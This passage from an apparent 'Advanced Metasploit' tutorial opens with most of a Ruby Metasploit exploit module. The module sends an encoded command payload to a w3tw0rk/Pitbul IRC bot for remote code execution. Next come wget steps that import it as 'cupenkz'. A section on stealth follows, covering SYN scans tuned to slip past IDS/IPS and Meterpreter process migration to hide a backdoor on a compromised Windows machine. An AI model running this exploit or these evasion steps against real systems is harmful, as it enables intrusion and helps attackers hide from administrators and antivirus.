'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'w3tw0rk', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 04 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}
channel")
Advanced Metasploit 45
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
Advanced Metasploit 46
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)}
#{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def w3tw0rk_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} chan-
nel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}
channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
w3tw0rk_command(sock)
quit(sock)
disconnect
end
Advanced Metasploit 47
end
_________________________________________________snip_______________________________________________
The script above is a structure for writing an exploit for Metasploit. You can add or rewrite the exploit if you want. The
source can be downloaded here: https://www.exploit-db.com/exploits/38302/.
After downloading the source, copy it into the directory with the Metasploit command:
root@sungai : ~# wget https://www.exploit-db.com/exploits/38302/; mv 38302
cupenkz.rb; mv cupenkz.rb ~/.msf4/modules/exploits/
Note:
- wget is the command for downloading the exploit file
- mv is the command for renaming and moving the file

F IGURE 79: D OWNLOAD EXPLOIT AND IMPORT TO METASPLOIT DIRECTORY

After downloading the exploit to be imported, run the command reload_all to reload all settings that have been changed
before.

F IGURE 80: RELOAD ALL NEW MODULE ON METASPLOIT

After reloading all new modules on Metasploit, you can search for module with the command:
msf> search cupenkz

F IGURE 81: SEARCHING CUPENKZ EXPLOIT

There is one exploit named cupenkz, with the description exploit Pitbul IRC Bot Remote Code Execution. Now use the
exploit with the command:
msf> use exploit/cupenkz

F IGURE 82: USE EXPLOIT CUPENKZ

It can be seen, after you import the module itself, that indirectly you've made a custom module to be added to Metasploit.
Advanced Metasploit 48

6. Stealthy techniques when using Metasploit.

Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been acquired can be
entered at any time; the attacker can then perform scanning and other techniques in many circumstances where it seems
unimaginable. In this example, the target has IDS/IPS, which is very paranoid, so that when it is done, the IDS/IPS instantly
displays a warning and alerts the attacker. The target also has AV/antirootkit so, when installing a backdoor, it will be
known by admin.
This time I pointed out that the attacker is scanning the target and is not suspicious. However, not all administrators can
bypass, because setting a system depends on whether or not it is paranoid about that setting.
First of all, I run Metasploit with the command:
root@sungai:~# msfconsole

F IGURE 83: S TART METASPLOIT

Then use the module auxiliary/scanner/Portscan/syn:
msf> use auxiliary/scanner/portscan/syn
Advanced Metasploit 49

F IGURE 84: USING AUXILIARY /SCANNER /PORTSCAN/SYN

The module option can be seen above; it appears that the attacker can adjust the settings for how many ports will be
scanned and how much timeout is used. It is as if you are knocking on a door: If you knock on the door as much as 100
times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send multiple
packets as much as 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up to do the
scanning of ports 20-30 only, and setting timeout to 200. Use the command
msf auxiliary (syn)> set ports 20-30
msf auxiliary (syn)> set timeout 200

F IGURE 85: SETTING PORT AND TIMEOUT

After setting port and timeout, you must set the IP target, with the command:
msf auxiliary (syn)> set rhosts 192.168.109.1

F IGURE 86: SETTING IP TARGET

Then you can run with the command:
msf auxiliary (syn)> run

F IGURE 87: RUNNING SYN SCAN 7

From the picture above, we see that the target has port 22 open. The result of port scanning is short because I did not use
random port scanning and tried to do stealthy scanning
Advanced Metasploit 50

My second example is where, after getting access to a computer target, I put a stealth backdoor into the victim's computer.
The backdoor is installed here using the migrate feature contained in Meterpreter. The feature creates a fictitious process
on the target computer.
Here I use the PS command in Meterpreter when a target has been hacked:

F IGURE 88: PROCESS ON COMPUTER TARGET

The picture above shows all processes on the target computer; after I see all these processes, I use the command:
Meterpreter > run post/windows/manage/migrate

F IGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER

The picture above shows that the command creates a fictitious process for Meterpreter so the svchost.exe process is ma-
nipulated to run Meterpreter on the target computer. The results are shown below:
Advanced Metasploit 51

F IGURE 90: FICTITIOUS PROCESS RUNNING

Results from the victim's computer that is running a fictitious process show the process PID 1240 running notepad.exe,
where the application is fictitious.